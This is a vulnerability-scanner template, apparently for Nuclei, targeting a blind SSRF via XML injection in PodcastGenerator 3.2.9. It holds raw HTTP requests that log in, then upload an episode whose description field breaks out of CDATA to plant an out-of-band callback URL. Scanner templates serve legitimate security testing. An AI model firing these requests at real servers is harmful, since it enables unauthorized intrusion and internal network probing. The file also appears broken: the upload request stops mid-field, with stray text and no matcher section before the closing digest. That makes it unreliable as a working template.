id: podcast-generator-ssrf

info:
  name: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
  author: ritikchaddha,MrHarshvardhan
  severity: high
  description: |
    This is an SSRF vulnerability via XML injection found in PodcastGenerator 3.2.9.
  reference:
    - https://www.exploit-db.com/exploits/51565
    - https://mirabbasagalarov.medium.com/podcastgenerator-3-2-9-blind-ssrf-via-xml-injection-3795804467df
    - https://github.com/PodcastGenerator/PodcastGenerator
  metadata:
    verified: true
    max-request: 3
  tags: podcastgenerator,ssrf,authenticated,intrusive

variables:
  string: "{{rand_text_alpha(7)}}"

http:
  - raw:
      - |
        POST /podcast/PodcastGenerator/admin/login.php?login=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        GET /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1WfeHRSBn1aNkQQA

        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="file"; filename="{{string}}.jpg"
        Content-Type: image/jpeg

        {{rand_text_alpha(50)}}
        {{rand_text_alpha(50)}}
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="title"

        {{string}}
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="shortdesc"

        test]]>http://{{interactsh-url}}' internal: true
# digest: 4a0a004730450221008a5f3b9dd7979252a7a14b8be40494f734292f7e0beecf25b6b94ec3fa209a3d022062f7379a4e29a928ff360fb11e6894ee4aa39399be29c922a1f63b6662551c01:922c64590222798bb761d5b6d8e72950